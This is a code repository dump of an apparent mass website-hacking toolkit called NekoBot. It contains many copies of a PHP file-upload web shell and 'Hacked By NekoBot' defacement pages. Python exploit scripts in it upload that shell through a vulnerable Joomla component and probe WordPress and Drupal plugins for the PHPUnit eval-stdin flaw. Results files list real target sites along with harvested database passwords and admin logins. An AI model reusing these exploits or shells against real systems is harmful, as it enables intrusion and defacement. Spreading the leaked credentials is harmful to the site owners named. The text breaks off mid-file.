├── files
    ├── neko.txt
    ├── grav.png
    ├── neko.gif
    ├── pwn.gif
    ├── rock.jpg
    ├── rock.zip
    ├── index.jpg
    ├── shell.jpeg
    ├── shell.jpg
    ├── jdownlods.zip
    ├── neko.htm
    ├── neko2.htm
    ├── neko3.htm
    ├── pwn.php
    ├── shell.php
    ├── up.php
    ├── up2.php
    ├── up3.php
    ├── neko.php
    ├── neko2.php
    ├── neko3.php
    ├── vuln.php3.j
    ├── settings_auto.php
    ├── shcode.txt
    ├── banner.txt
    ├── OsComPayLoad.php
    └── base64RCE.txt
├── cms
    ├── opencart.txt
    ├── vBulletin.txt
    ├── joomla.txt
    └── drupal.txt
├── result
    ├── Laravel_Info.txt
    ├── Config_results.txt
    ├── AdminTakeover_results.txt
    ├── SqlInjection_targets.txt
    ├── Wordpress_Hacked.txt
    └── pwd_WordpressSites.txt
├── scrot_2021-04-01-41_680x362.png
├── Tools
    ├── __pycache__
    │   ├── cms.cpython-38.pyc
    │   ├── Sqli.cpython-38.pyc
    │   ├── cpanel.cpython-38.pyc
    │   ├── __init__.cpython-38.pyc
    │   ├── getSMTP.cpython-38.pyc
    │   └── wsoShellUploaderModule.cpython-38.pyc
    ├── wsoShellUploaderModule.py
    ├── getSMTP.py
    ├── cpanel.py
    └── Sqli.py
├── BruteForce
    ├── __pycache__
    │   ├── Drupal.cpython-38.pyc
    │   ├── Joomla.cpython-38.pyc
    │   ├── Opencart.cpython-38.pyc
    │   ├── __init__.cpython-38.pyc
    │   ├── Wordpress.cpython-38.pyc
    │   └── FTPBruteForce.cpython-38.pyc
    ├── Joomla.py
    └── FTPBruteForce.py
├── Exploits
    ├── wpinstall.py
    ├── Com_jwallpapers.py
    ├── Drupal_mailchimp.py
    ├── Wp_prh_api.py
    ├── Wp_cloudflare.py
    ├── Wp_mmplugin.py
    ├── WPJekyll_Exporter.py
    ├── Wprealia.py
    ├── Wp_enfold_child.py
    ├── Com_bt_portfolio.py
    ├── Wp_dzs_videogallery.py
    ├── Wp_contabileads.py
    ├── Wpwoocommercesoftware.py
    ├── CVE_2017_16562userpro.py
    ├── wp_miniaudioplayer.py
    ├── Wp_HD_WebPlayer.py
    ├── CVE_2019_9978SocialWarfare.py
    ├── Presta_videostab.py
    ├── cartabandonmentproOld.py
    ├── Com_oziogallery.py
    ├── Com_b2jcontact.py
    ├── CVE_2015_5151_revsliderCSS.py
    ├── Com_simplephotogallery.py
    ├── Com_Myblog.py
    ├── Wp_Job_Manager.py
    ├── Com_Fabric.py
    ├── Wp_pagelines.py
    ├── CVE_2018_19207wp_gdpr_compliance.py
    ├── CVE_2019_9879wp_graphql.py
    ├── wp_eshop_magic.py
    ├── wp_ungallery.py
    ├── WpCateGory_page_icons.py
    ├── Com_alberghi.py
    ├── Wp_addblockblocker.py
    ├── Com_Macgallery.py
    ├── Com_CCkJseblod.py
    ├── cherry_plugin.py
    ├── Com_Hdflvplayer.py
    ├── Com_Joomanager.py
    ├── wp_support_plus_responsive_ticket_system.py
    ├── Com_s5_media_player.py
    ├── wp_barclaycart.py
    ├── CVE_2014_3704Drupal_add_Admin.py
    ├── Com_JCEindex.py
    ├── viral_optinsExploit.py
    ├── com_media.py
    ├── Com_redmystic.py
    ├── Presta_soopamobile.py
    ├── Presta_soopabanners.py
    ├── Presta_vtermslideshow.py
    ├── Presta_simpleslideshow.py
    ├── CVE_2015_4455_gravityformsindex.py
    ├── CVE_2019_16759vBulletinRCE.py
    ├── Presta_productpageadverts.py
    ├── CVE_2014_4725wysija.py
    ├── Com_civicrm.py
    ├── WooCommerce_ProductAddonsExp.py
    ├── Presta_tdpsthemeoptionpanel.py
    ├── Presta_psmodthemeoptionpanel.py
    ├── WP_User_Frontend.py
    ├── Presta_wdoptionpanel.py
    ├── printModule.py
    ├── Com_JCE.py
    ├── Com_extplorer.py
    ├── Presta_wg24themeadministration.py
    ├── CVE_2019_6340Drupal8RESTful.py
    ├── Com_rokdownloads.py
    ├── Headway.py
    ├── Com_SexyContactform.py
    ├── CVE_2006_2529fckeditor.py
    ├── CVE_2017_9841PHPUnit.py
    ├── Com_Jbcatalog.py
    ├── Com_facileforms.py
    ├── CVE_2015_1579_revsliderConfig.py
    ├── CVE_2008_3362Download_Manager.py
    ├── CVE_2016_9838TakeAdminJoomla.py
    ├── CVE_2015_4455_gravityforms.py
    ├── Com_FoxContent.py
    ├── wp_content_injection.py
    ├── CVE_2019_15866_crelly_slider.py
    ├── formcraft.py
    ├── CVE_2018_7600Drupalgeddon2.py
    └── com_jdownloads.py
└── README.md


/files/neko.txt:
--------------------------------------------------------------------------------
1 | Hacked By Nekobot


--------------------------------------------------------------------------------
/cms/opencart.txt:
--------------------------------------------------------------------------------
1 | cakesurat.com
2 | 


--------------------------------------------------------------------------------
/cms/vBulletin.txt:
--------------------------------------------------------------------------------
1 | www.untold.co.id
2 | bobobox.co.id
3 | 


--------------------------------------------------------------------------------
/result/Laravel_Info.txt:
--------------------------------------------------------------------------------
1 | ecuahit.net//.env
2 | www.nazksa.com/.env
3 | 


--------------------------------------------------------------------------------
/files/grav.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tegal1337/NekoBotV1/HEAD/files/grav.png


--------------------------------------------------------------------------------
/files/neko.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tegal1337/NekoBotV1/HEAD/files/neko.gif


--------------------------------------------------------------------------------
/files/pwn.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tegal1337/NekoBotV1/HEAD/files/pwn.gif


--------------------------------------------------------------------------------
/files/rock.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tegal1337/NekoBotV1/HEAD/files/rock.jpg


--------------------------------------------------------------------------------
/files/rock.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tegal1337/NekoBotV1/HEAD/files/rock.zip


--------------------------------------------------------------------------------
/files/index.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tegal1337/NekoBotV1/HEAD/files/index.jpg


--------------------------------------------------------------------------------
/files/shell.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tegal1337/NekoBotV1/HEAD/files/shell.jpeg


--------------------------------------------------------------------------------
/files/shell.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tegal1337/NekoBotV1/HEAD/files/shell.jpg


--------------------------------------------------------------------------------
/files/jdownlods.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tegal1337/NekoBotV1/HEAD/files/jdownlods.zip


--------------------------------------------------------------------------------
/scrot_2021-04-01-41_680x362.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tegal1337/NekoBotV1/HEAD/scrot_2021-04-01-41_680x362.png


--------------------------------------------------------------------------------
/Tools/__pycache__/cms.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tegal1337/NekoBotV1/HEAD/Tools/__pycache__/cms.cpython-38.pyc


--------------------------------------------------------------------------------
/Tools/__pycache__/Sqli.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tegal1337/NekoBotV1/HEAD/Tools/__pycache__/Sqli.cpython-38.pyc


--------------------------------------------------------------------------------
/Tools/__pycache__/cpanel.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tegal1337/NekoBotV1/HEAD/Tools/__pycache__/cpanel.cpython-38.pyc


--------------------------------------------------------------------------------
/Tools/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tegal1337/NekoBotV1/HEAD/Tools/__pycache__/__init__.cpython-38.pyc


--------------------------------------------------------------------------------
/Tools/__pycache__/getSMTP.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tegal1337/NekoBotV1/HEAD/Tools/__pycache__/getSMTP.cpython-38.pyc


--------------------------------------------------------------------------------
/BruteForce/__pycache__/Drupal.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tegal1337/NekoBotV1/HEAD/BruteForce/__pycache__/Drupal.cpython-38.pyc


--------------------------------------------------------------------------------
/BruteForce/__pycache__/Joomla.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tegal1337/NekoBotV1/HEAD/BruteForce/__pycache__/Joomla.cpython-38.pyc


--------------------------------------------------------------------------------
/BruteForce/__pycache__/Opencart.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tegal1337/NekoBotV1/HEAD/BruteForce/__pycache__/Opencart.cpython-38.pyc


--------------------------------------------------------------------------------
/BruteForce/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tegal1337/NekoBotV1/HEAD/BruteForce/__pycache__/__init__.cpython-38.pyc


--------------------------------------------------------------------------------
/BruteForce/__pycache__/Wordpress.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tegal1337/NekoBotV1/HEAD/BruteForce/__pycache__/Wordpress.cpython-38.pyc


--------------------------------------------------------------------------------
/BruteForce/__pycache__/FTPBruteForce.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tegal1337/NekoBotV1/HEAD/BruteForce/__pycache__/FTPBruteForce.cpython-38.pyc


--------------------------------------------------------------------------------
/files/neko.htm:
--------------------------------------------------------------------------------
1 | <body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked By NekoBot<p style='color: transparent'>
2 | 


--------------------------------------------------------------------------------
/files/neko2.htm:
--------------------------------------------------------------------------------
1 | <body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked By NekoBot<p style='color: transparent'>
2 | 


--------------------------------------------------------------------------------
/files/neko3.htm:
--------------------------------------------------------------------------------
1 | <body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked By NekoBot<p style='color: transparent'>
2 | 


--------------------------------------------------------------------------------
/Tools/__pycache__/wsoShellUploaderModule.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tegal1337/NekoBotV1/HEAD/Tools/__pycache__/wsoShellUploaderModule.cpython-38.pyc


--------------------------------------------------------------------------------
/result/Config_results.txt:
--------------------------------------------------------------------------------
1 |  TargetDB = ecuahit.net//.env
2 |  Host:  localhost
3 |  user:  gonnav50_netplus
4 |  pass:  lOCl0v1Ob4
5 |  DB:    gonnav50_netplus
6 | ---------------------
7 | 


--------------------------------------------------------------------------------
/result/AdminTakeover_results.txt:
--------------------------------------------------------------------------------
1 | www.tjiwi.co.id/administrator/index.php --> Active Link Sended to: lolicode33@gmail.com
2 |   Username: u1337
3 |   Password: admin1337
4 | ------------------------------------------
5 | 


--------------------------------------------------------------------------------
/result/SqlInjection_targets.txt:
--------------------------------------------------------------------------------
1 | http://www.ubraintv.com/watch.php?id=1114
2 | http://kansascitynova.org/news.php?id=44
3 | http://icdcprague.org/index.php?id=10
4 | http://www.ampak.com.tw/product_list.php?cid=1
5 | http://www.smtmax.com/info.php?act=About
6 | http://berkeleyrecycling.org/page.php?id=1
7 | http://www.cordoganclark.com/newsitem.php?id=78
8 | 


--------------------------------------------------------------------------------
/files/pwn.php:
--------------------------------------------------------------------------------
1 | 
2 | <title>Hacked By NekoBot</title><?php echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }else { echo '<b>Not uploaded ! </b><br><br>'; }}?>
3 | 


--------------------------------------------------------------------------------
/files/shell.php:
--------------------------------------------------------------------------------
1 | 
2 | <title>Hacked By NekoBot</title><?php echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }else { echo '<b>Not uploaded ! </b><br><br>'; }}?>
3 | 


--------------------------------------------------------------------------------
/files/up.php:
--------------------------------------------------------------------------------
1 | 
2 | <title>Hacked By NekoBot</title><?php echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }else { echo '<b>Not uploaded ! </b><br><br>'; }}?>
3 | 


--------------------------------------------------------------------------------
/files/up2.php:
--------------------------------------------------------------------------------
1 | 
2 | <title>Hacked By NekoBot</title><?php echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }else { echo '<b>Not uploaded ! </b><br><br>'; }}?>
3 | 


--------------------------------------------------------------------------------
/files/up3.php:
--------------------------------------------------------------------------------
1 | 
2 | <title>Hacked By NekoBot</title><?php echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }else { echo '<b>Not uploaded ! </b><br><br>'; }}?>
3 | 


--------------------------------------------------------------------------------
/files/neko.php:
--------------------------------------------------------------------------------
1 | 
2 | <title>Hacked By NekoBot</title><?php echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }else { echo '<b>Not uploaded ! </b><br><br>'; }}?>
3 | 


--------------------------------------------------------------------------------
/files/neko2.php:
--------------------------------------------------------------------------------
1 | 
2 | <title>Hacked By NekoBot</title><?php echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }else { echo '<b>Not uploaded ! </b><br><br>'; }}?>
3 | 


--------------------------------------------------------------------------------
/files/neko3.php:
--------------------------------------------------------------------------------
1 | 
2 | <title>Hacked By NekoBot</title><?php echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }else { echo '<b>Not uploaded ! </b><br><br>'; }}?>
3 | 


--------------------------------------------------------------------------------
/files/vuln.php3.j:
--------------------------------------------------------------------------------
1 | 
2 | <title>Hacked By NekoBot</title><?php echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }else { echo '<b>Not uploaded ! </b><br><br>'; }}?>
3 | 


--------------------------------------------------------------------------------
/files/settings_auto.php:
--------------------------------------------------------------------------------
1 | 
2 | <title>Hacked By NekoBot</title><?php echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }else { echo '<b>Not uploaded ! </b><br><br>'; }}?>
3 | 


--------------------------------------------------------------------------------
/files/shcode.txt:
--------------------------------------------------------------------------------
 1 | <title>Hacked By NekoBot</title>
 2 | <?php
 3 | echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
 4 | echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
 5 | if( $_POST['_upl'] == "Upload" ) {
 6 | if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }
 7 | else { echo '<b>Not uploaded ! </b><br><br>'; }
 8 | }
 9 | ?>
10 | 


--------------------------------------------------------------------------------
/files/banner.txt:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 |   _   _      _         ____        ___      ____
 4 |  | \ | |    | |       |  _ \      | \ \    / /_ |
 5 |  |  \| | ___| | _____ | |_) | ___ | |\ \  / / | |
 6 |  | . ` |/ _ \ |/ / _ \|  _ < / _ \| __\ \/ /  | |
 7 |  | |\  |  __/   < (_) | |_) | (_) | |_ \  /   | |
 8 |  |_| \_|\___|_|\_\___/|____/ \___/ \__| \/    |_|Rev
 9 | 
10 | Author : LoliC0d3             https://github.com/LoliC0d3
11 | Made With Love By Tegal1337   https://github.com/tegal1337
12 | 
13 | Any risk of a criminal act that you commit is not our responsibility
14 | 


--------------------------------------------------------------------------------
/result/Wordpress_Hacked.txt:
--------------------------------------------------------------------------------
 1 | http://atlasi.al/wp-login.php
 2 |  Username: root
 3 |  Password: password
 4 | -----------------------------------------
 5 | http://tradesman.uk/wp-login.php
 6 |  Username: admin
 7 |  Password: pass
 8 | -----------------------------------------
 9 | http://woocommerce-pos.openswatch.com/wp-login.php
10 |  Username: admin
11 |  Password: admin123
12 | -----------------------------------------
13 | http://woocommerce-pos.openswatch.com/wp-login.php
14 |  Username: admin
15 |  Password: admin123
16 | -----------------------------------------
17 | http://shop2.cuatao.net/wp-login.php
18 |  Username: admin
19 |  Password: admin123
20 | -----------------------------------------
21 | http://checkochal.com/wp-login.php
22 |  Username: admin
23 |  Password: admin
24 | -----------------------------------------
25 | 


--------------------------------------------------------------------------------
/cms/joomla.txt:
--------------------------------------------------------------------------------
 1 | bancaperilweb.it/
 2 | www.strapizza.it/
 3 | www.strapizza.it/
 4 | www.edusalta.gov.ar/
 5 | www.edusalta.gov.ar/
 6 | www.salford-systems.com/
 7 | bachelor.it/
 8 | abft.org/
 9 | www.salford-systems.com/
10 | www.labelchip.it/
11 | www.officinaparfum.com/
12 | abft.org/
13 | unop-dz.org/
14 | www.so-vietnam-travel.com/
15 | www.so-vietnam-travel.com/
16 | stepinforum.org/
17 | stepinforum.org/
18 | www.pilotmix.com/
19 | www.pilotmix.com/
20 | www.ortodossia.it/w/index.php?lang=it
21 | www.ortodossia.it/w/index.php?lang=it
22 | www.multimedica.es/
23 | club-elit.com/
24 | pn-medankota.go.id/v3/
25 | infragroup.net/
26 | www.medenosrce.net/
27 | am-sl.com/
28 | yasorg.ir/
29 | filarmonicabanatul.ro/
30 | iibimsolutions.ir/fa/
31 | caravaningalava.org/
32 | tudoparaviajar.com/
33 | www.priesterforum.net/
34 | annex.pro/
35 | www.der.wa.gov.au/
36 | ccrc.tc.columbia.edu
37 | ccrc.tc.columbia.edu
38 | www.ircinoac.co.id
39 | ccrc.tc.columbia.edu
40 | www.ircinoac.co.id
41 | www.tjiwi.co.id
42 | ccrc.tc.columbia.edu
43 | ccrc.tc.columbia.edu
44 | www.tjiwi.co.id
45 | 


--------------------------------------------------------------------------------
/Exploits/wpinstall.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | 
 6 | r = '\033[31m'
 7 | g = '\033[32m'
 8 | y = '\033[33m'
 9 | b = '\033[34m'
10 | m = '\033[35m'
11 | c = '\033[36m'
12 | w = '\033[37m'
13 | Headers = {
14 |         "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) "
15 |                       "AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
16 |     }
17 | 
18 | def Exploit(site):
19 |     try:
20 |         cH = requests.get('http://{}/wp-admin/setup-config.php'.format(site), timeout=7, headers=Headers)
21 |         if '<form id="setup" method="post" action="?step=0"' in str(cH.content):
22 |             with open('result/wp-install.txt', 'a') as writer:
23 |                 writer.write('{}/wp-admin/setup-config.php\n'.format(site))
24 |             return printModule.returnYes(site, 'N/A', 'Wp-Install', 'Wordpress')
25 |         else:
26 |             return printModule.returnNo(site, 'N/A', 'Wp-Install', 'Wordpress')
27 |     except:
28 |         return printModule.returnNo(site, 'N/A', 'Wp-Install', 'Wordpress')
29 | 


--------------------------------------------------------------------------------
/Exploits/Com_jwallpapers.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | Headers = {
 6 |     'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'
 7 | }
 8 | 
 9 | def Exploit(site):
10 |     try:
11 |         PostFile = {
12 |             'file': open('files/up.php', 'rb')
13 |         }
14 |         requests.post('http://' + site + '/index.php?option=com_jwallpapers&task=upload',
15 |                       files=PostFile, timeout=10, headers=Headers)
16 |         CheckShell = requests.get('http://' + site + '/jwallpapers_files/plupload/up.php',
17 |                                   timeout=10, headers=Headers)
18 |         if 'Vuln!!' in str(CheckShell.content):
19 |             with open('result/Shell_results.txt', 'a') as writer:
20 |                 writer.write(site + '/jwallpapers_files/plupload/up.php' + '\n')
21 |             return printModule.returnYes(site, 'N/A', 'Com_jwallpapers', 'Joomla')
22 |         else:
23 |             return printModule.returnNo(site, 'N/A', 'Com_jwallpapers', 'Joomla')
24 |     except:
25 |         return printModule.returnNo(site, 'N/A', 'Com_jwallpapers', 'Joomla')
26 | 


--------------------------------------------------------------------------------
/Exploits/Drupal_mailchimp.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import CVE_2017_9841PHPUnit
 4 | from Exploits import printModule
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {
13 |         "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) "
14 |                       "AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
15 |     }
16 | 
17 | def Exploit(site):
18 |     try:
19 |         vv = site + '/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/build.xml'
20 |         Exp = '/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
21 |         CheckVuln = requests.get('http://{}'.format(vv), timeout=10, headers=Headers)
22 |         if 'taskname="phpunit"' in str(CheckVuln.content):
23 |             return CVE_2017_9841PHPUnit.Exploit(site, Exp, 'mailchimp', 'Drupal')
24 |         else:
25 |             return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit mailchimp', 'Drupal')
26 |     except:
27 |         return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit mailchimp', 'Drupal')
28 | 


--------------------------------------------------------------------------------
/Exploits/Wp_prh_api.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | from Exploits import CVE_2017_9841PHPUnit
 5 | 
 6 | 
 7 | r = '\033[31m'
 8 | g = '\033[32m'
 9 | y = '\033[33m'
10 | b = '\033[34m'
11 | m = '\033[35m'
12 | c = '\033[36m'
13 | w = '\033[37m'
14 | Headers = {
15 |         "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) "
16 |                       "AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
17 |     }
18 | 
19 | def Exploit(site):
20 |     try:
21 |         vv = site + '/wp-content/plugins/prh-api/vendor/phpunit/phpunit/build.xml'
22 |         Exp = '/wp-content/plugins/prh-api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
23 |         CheckVuln = requests.get('http://{}'.format(vv), timeout=10, headers=Headers)
24 |         if 'taskname="phpunit"' in str(CheckVuln.content):
25 |             return CVE_2017_9841PHPUnit.Exploit(site, Exp, 'prh-api', 'Wordpress')
26 |         else:
27 |             return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit prh-api', 'Wordpress')
28 |     except:
29 |         return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit prh-api', 'Wordpress')
30 | 


--------------------------------------------------------------------------------
/Exploits/Wp_cloudflare.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | from Exploits import CVE_2017_9841PHPUnit
 5 | 
 6 | r = '\033[31m'
 7 | g = '\033[32m'
 8 | y = '\033[33m'
 9 | b = '\033[34m'
10 | m = '\033[35m'
11 | c = '\033[36m'
12 | w = '\033[37m'
13 | Headers = {
14 |         "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) "
15 |                       "AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
16 |     }
17 | 
18 | def Exploit(site):
19 |     try:
20 |         vv = site + '/wp-content/plugins/cloudflare/vendor/phpunit/phpunit/build.xml'
21 |         Exp = '/wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
22 |         CheckVuln = requests.get('http://{}'.format(vv), timeout=10, headers=Headers)
23 |         if 'taskname="phpunit"' in str(CheckVuln.content):
24 |             return CVE_2017_9841PHPUnit.Exploit(site, Exp, 'cloudflare', 'Wordpress')
25 |         else:
26 |             return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit cloudflare', 'Wordpress')
27 |     except:
28 |         return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit cloudflare', 'Wordpress')
29 | 


--------------------------------------------------------------------------------
/Exploits/Wp_mmplugin.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | from Exploits import CVE_2017_9841PHPUnit
 5 | 
 6 | r = '\033[31m'
 7 | g = '\033[32m'
 8 | y = '\033[33m'
 9 | b = '\033[34m'
10 | m = '\033[35m'
11 | c = '\033[36m'
12 | w = '\033[37m'
13 | Headers = {
14 |         "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) "
15 |                       "AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
16 |     }
17 | 
18 | def Exploit(site):
19 |     try:
20 |         vv = site + '/wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/build.xml'
21 |         Exp = '/wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
22 |         CheckVuln = requests.get('http://{}'.format(vv), timeout=10, headers=Headers)
23 |         if 'taskname="phpunit"' in str(CheckVuln.content):
24 |             return CVE_2017_9841PHPUnit.Exploit(site, Exp, 'mm-plugin', 'Wordpress')
25 |         else:
26 |             return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit mm-plugin', 'Wordpress')
27 |     except:
28 |         return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit mm-plugin', 'Wordpress')
29 | 


--------------------------------------------------------------------------------
/Exploits/WPJekyll_Exporter.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import CVE_2017_9841PHPUnit
 4 | from Exploits import printModule
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {
13 |         "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) "
14 |                       "AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
15 |     }
16 | 
17 | def Exploit(site):
18 |     try:
19 |         vv = site + '/wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/build.xml'
20 |         Exp = '/wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
21 |         CheckVuln = requests.get('http://{}'.format(vv), timeout=10, headers=Headers)
22 |         if 'taskname="phpunit"' in str(CheckVuln.content):
23 |             return CVE_2017_9841PHPUnit.Exploit(site, Exp, 'jekyll-exporter', 'Wordpress')
24 |         else:
25 |             return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit jekyll-exporter', 'Wordpress')
26 |     except:
27 |         return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit jekyll-exporter', 'Wordpress')
28 | 


--------------------------------------------------------------------------------
/Exploits/Wprealia.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import CVE_2017_9841PHPUnit
 4 | from Exploits import printModule
 5 | 
 6 | 
 7 | r = '\033[31m'
 8 | g = '\033[32m'
 9 | y = '\033[33m'
10 | b = '\033[34m'
11 | m = '\033[35m'
12 | c = '\033[36m'
13 | w = '\033[37m'
14 | Headers = {
